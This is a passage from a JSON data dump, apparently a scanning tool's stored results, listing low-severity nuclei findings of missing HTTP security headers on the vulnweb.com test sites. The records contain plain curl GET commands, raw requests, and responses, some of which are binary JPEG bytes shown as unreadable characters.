en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4345\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:20 GMT\r\nEtag: "4dca64a1-10f9"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001d\u0001\u0001\u0005\u0001\u0001\u0001\u0004\u0003\u0005\u0006\u0007\b\t\u0002\u0001��:\u0010\u0002\u0001\u0003\u0003\u0002\u0005\u0001\u0006\u0004\u0004\u0007\u0001\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061\u0007\u0013"AQa\u00142q���\u0015#B�\bR��\u0016$br������\u001b\u0001\u0001\u0005\u0001\u0001\u0001\u0002\u0003\u0004\u0006\u0005\u0007��0\u0011\u0002\u0002\u0001\u0003\u0003\u0001\u0006\u0005\u0005\u0001\u0001\u0002\u0003\u0011\u0004!1\u0005\u0012A"\u0006\u0013\u0014aq�2����BQ������\f\u0003\u0001\u0002\u0011\u0003\u0011?�JR��~���'�\rz5���[��PU�pT\u0012\t�$�a߷֛)�\u001f��T��ĩUn ��y!�7�Xث��\n�pA\u0007�~C\u001b�*�\u0012���*���O`)�\u0014�[n?\u000bm���_��Fv���@Hls���X���:�u\u000f��ݣ�e.��"�G�#<7��#\u0004�0Mh�)�q.\t\u001dR^\t�\u0015�\u0017�]iڽ��-�\u0013,',���\u0018��<�;��gu\u001e�\u000e����P\t�e�7*��'����M��\fVR�LH������\f\u001c�ˑ�\u0007\u0015�i]=\u0012�+.X\u00101���9\u0003۵f��I����\u0005��Ma\u001cg��M�^�kp1$M��\u0010\u000f�\u0019��\u0011�"�WV�/OEu%�\u0017\u0010�,�ݸ>p0�l��\u0003 �\\v��=K�E�ot���[iZ3�\n�\u0001����\u001f��E���;rS��[-ԥ*�\b�)@\nR��)@\nR�DŽ�\u001a����x��\u0012��६�C ~1�\u001c烐p1ۜT:�Ezx;,xHt ���/��[T��Oan��\u0014�6]FH ��~\u000e����Ji��\u0014��j;���OW�\u001f�\u001f53��4��n$��9\u0012eo0�`�b�9\u0001�#,��\u0004��Y����.\u0012g�[{�\\1\f������������azj����->���Ma��\u0011�ꚽ��\u0018f�G�q\u0012&�&3��Q�0T��������E�[^�Is�tp�[1\f{�\r��~\u0004�z�5�G\u0012eG�:�@8'�\u001e@� \u0001��H�\\6����8�� �\u001c�ƌz��;��1�y��\u0013\\�=���\n*\\~ÝUJO(�ZD!\u0002$��e�\u000eCn\u001fF\u001c\u001fʯ�t�w�K\u001cc\u0002u-\u001b�68�\u0019?\\sߜ�qY���$���뱉b\n���>~�Z��8S�Q���s�U;z����̙(��[�X]DV\u001b�W}�\u0002\\\t\u001c\u001e���\b�Y��h�F��\n4��a��8�l�\u001e;�\u0013�*�5��^-��3�\u0001 pO������k\u0003\u0018�n#B\u0019J�<�\u001e��]F��/�'zQ��d�0\\}�y\u001b|ou4H\u0013��Y�g#��3\\��$�\u0017�����A"G�Z��1�y�&7���3��}��.���NH��0�\r�g\t�L\u0012���X\u000f�\u001e\u001f���ؠ��\u001e�\f�u��p��\f��\u0014�\\��\u0007\u0007\u0018=N��#��E��/)���7�{\f.N �JԬ��o�,�#1����J��������*-zj�tr�*�A"���a\u0013�"�\u000e\u000b\t������@\nR��)@\nݽ\u0019�\u000e��tJi7�;\u000f�\b\u001d\u0004W6Q�^bn\u001b��r�\u0001݇\fG�q��*U}N��TT-YI�t&��\u0013�n���7�tKy�n-�%x\u0004�\bϨ\f.C\u0002ʳ\u0005$pH8�\b[��"]�-���,�r-\\\u0004i��#.Oel\u0010\u001b�;O#\u0019�O\n�@��}n9�.�\u000f i�\u0007��o�\u0003�\nϺ��[�g�4�m<�:��Y��+mf���n�\u0015�M��Fw��\u0007z�_�ŰԿq�1��\u001f,y-���[��}2�\u0005 x�Q<Bkq'\u000f�\u0003r���I\u0003\u001f\u0004|\u001a�%�b΀�\u0007'��.��g�����ݕ����\u0015i!�+�1�\u0001\u000e�%�\u0018����F+=�b��1ナ�YMt݋��ș�\u0019Dt��\u0014\\�\u000e_fcRC}x�\u000fDZ�>�\rݵմ�kr�\u0016��ψ��^0Ɂ�\\\u0013�\u00169<�\u0001W8�Y�z\u0015<�;Np�����U\u0003�\u0004\u000eǸ��Дc?W\u0001��"�\\%�@��'\u0001��ʺ�����=�\u001a�P��7��\u001f� �K;��\u001c��\u0006\t\\z�\u0017�\u0005��0��rx\u0018\u0019�n)�M��_�G"5�I%��\t\u0002V�����qT��/,\u000e�\u0019]C�\u0003��\n��\u0003R���a\u0001\u0016�\u0014h�E��1\u0004�p\u000f\u001f8��QU\\��\u0016^E�74w��\u0010�p�sG�b�\u0015\u0001fE?˺���l\u0003\u001e;\u0006��.\u0003ᯄ6�\u00163[u��MQ�%b��hT*�0R;�'��\\`溺�$��<�(0�\u0018�|`��U�P��]ķ�!�B�>0T�a\t��\u0019\u001e�\u0011�gAG]�Q��f���RǏ��"�\u001c��5~��t��M�6��$p��I��+�m�\f\u0002{�x��9\u000bZ�.�mR�O�����r���<\u0010\u000e\b�}\rz;\fP�\u001cN�dP7F㜃��pG��\\��'|5�L\u000f�Z4\u0011��)k����I�#.J�z\u0007$�=9�8\u0002�~�u��t^��\u001f_�3Q\u00055���\\�)[€�)@\nR��)@\u001d5�7�K'H�\u001a���}.O9\u001eFr\u0004\u001d�*�\u000b(�\r��v\u001c1<o��EK[����1R$i\u000b\u0015�c@����\r���\u001c�\n��@�nt]R\u001b�6ı��̧�S��Eu����%��q̗��л\u001c\u0003�$�\u0019��)��\f�\rb���**WU���Ogz�f�Ԅ����\u001d��-< *��d1��\u0014c<\u001f�q����j���Im$��:\u000f0\u0014V_Ab\u0007��\u0004\u0015*W$����Z����;M\u0006�SYLRYrʌ]��\u0014\u000e\u0007��\u00198�\t�lU�ÿ\u0013���d�\u0013ej���e���\u001f��\u0018e*�6{z\u0018}�\u000e\u001d\u001d3U\n%j_-��G�4�2����������1��bIc�f\u0001ܣ%\u001aA�'�RN\u0014\n�b>ߤ���>Z2�g\b��r��r\n�#���-N���\t�l�2�BF\u000f�\u0011�E}i��'��ܬ2yh��lM����@?�\u000f\u001d��)O�\u0012�"4��\u0017\u000b4A�ӆ(�N@e$0\u0007\u0003 \u0010Goj4�b��W\u0002\t1�g<q��?\u000b�1���N\u0013��X���8\u000e��1\u001a�\u0007�rs��J�4{�{eNy��l���N�'\r��ڟ%��9?�\\H��樑d\u000e�y�vc\u0018�l\u001eC\f��c?��u\u0017�:�\u0018\u0015 ���9\u0007����E��h�f��N�? g�##>٩v�)q\n�\u0013\u0006\f��\u001d�����9+������5�أ%��}�\u0018x݁uw<r2�y�\u0019�܏bI0z�N�R���h�{gc�G*���F\u0018!�\u000er;\f��o�!�X���v��\u0003\u0003;� d�H'\u0007��y\u0014Yb����/\u001f���\u0016����Bj:O^����ks~��e��\u000b��\f7#�\u0001�Or\u0006\u0001\f=��ֽ\u0019��eݬ\u001a�������Ȍ\u001d\u001cP\f?�O\u0004w\u0007�A=ܶV�k�$� ���Ci+\u0016$$�\u0017�9>�\u0019\u001c\f2ջ�.���Γ�ѵ+cotS̷�\u001b\\E0�\n�3�0r\u0001*���6�j��\\m��\u001e�����^zd����Vs�x[��e��uu�I�m8o�t�\u0018���\t�̀\u001eX\f.\u0018\u001c\u0015l`ղ���Y�I�\n�.<�R� ���+$鞮�zz�h�Xs�E��S\u00122G>�c��t��\u0011�ĖP���&˩�M\u0014��w<�����,\t�>�P)�j7:N�\r唅'��\u0003�~��j\u0015)ZMa��:��z�\u0014�i.\r�0��b�6�.~�\u0012I��Ͼs���������[�V\r���˒�\u0016%s�<���5����\\�G�7NH��w���<Ռ>F@,�w\u0003�s�9"�����=jd&W��ԏ1�m��ڟ@��ܱ��\u0005�4��l�Q�K)�|c�:TNV�&f):��\f9��\u0003������\u000f|��H��Kx�9�Ya�\f�T��.J��]�%�w�|�&0�w\u0003�\u000foҲ�\u000eܢ�c�a�\\SP��\u0011$2��7\u001b��|~+\u001b��[[����0$�ô\u0010s�~y�g�����-/��_4D�ޑ���9��@\u001f#��S5m@\\�\u001e�0ϸ�2��($��}���N\u001a\u0019S-�c��62�5�V�t���VR�\u0019�~�F\b �`�Ի=v���V2<�\u0002�bA��1' �3ܑ�yƓ��R�U�\u001d��\u0018�E��9ܟ�\u0003۱����T=T�ƭ��RyU7�*��\tu\u0005�G\u0003qQ���ƬˢO�e��\u0010���Q�:��5�s�F�l�\b#�\u000fЃ����ZMom��s2��}���`\u001229�\b�����#��{v�\u001c��V�\u0018u#��@��\\��_X��RА;\\+�Y�}\u0003��\u001c��+��*N���)���?an�W\u0013lx��/��\u0017���t�wD4N��I�\u001d���\u001d�@? v���r9��������ו���7%�9��5N�=?�ס��~Ne��\u001eX�)Wȅ)JR��\u0005)J��^ɧjVװ�2[Ȳ�e\f\t\u00078 �\b�\u0011��۾��P�M�Fb�H��\u000b�\\+/\u0003�\u000e\t�\u0013���j�tް�,��k\u0015t{kv-\u0018 �\\�\u0006�\u0012H�&���\u0004un2���znu��}#]\u000f:��=9a�~ď�\u001a��j�V���ʪ\u00103��\u0006I\u001e��{r\u0007\u0015�4\u001dXKio{lΚh��)%\u001e�\u0018��\u001d�\u001c\u0015��c���\u001da\u0016�u\u0004s�C\u0018\u000b$C'w�\u0004��n\r��������\u0014]��G,�u7_ZOc\u0006�\u0010H�l����� s��\u001fp\u0006@'�����K4\u0010�{\u0015IJ@]�\u0016m\ny�8\u0018���\u001a�ɼ�.n��3J�\u0015��I��Q���#�Ը�り�Y�z�\u000b���}F�\u0012\u001a7��ubC����x8��8�Z.���v�����[\u001fO�I\f��F�� �#�\u0013�V�U�\b��cn\b���rX��e��|�=��A�(PB��m\\\u001eG\n���'V��\rA�Mf���w�!*�����[�QU����\u0016\u0007J�K�JR�\u0018)JP\u0002��)JP\u0002��)JP\u0006ᖳq��]?%�\ry����� �\b�;f����f��ۉ�\n�Y��4���X�Q�N�$��iJ�\u0018�s��Hߤ�Ҕ�$b��)JP\u0002����", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 944, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:32.364Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 945, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:42:32.622Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:58 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 946, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": 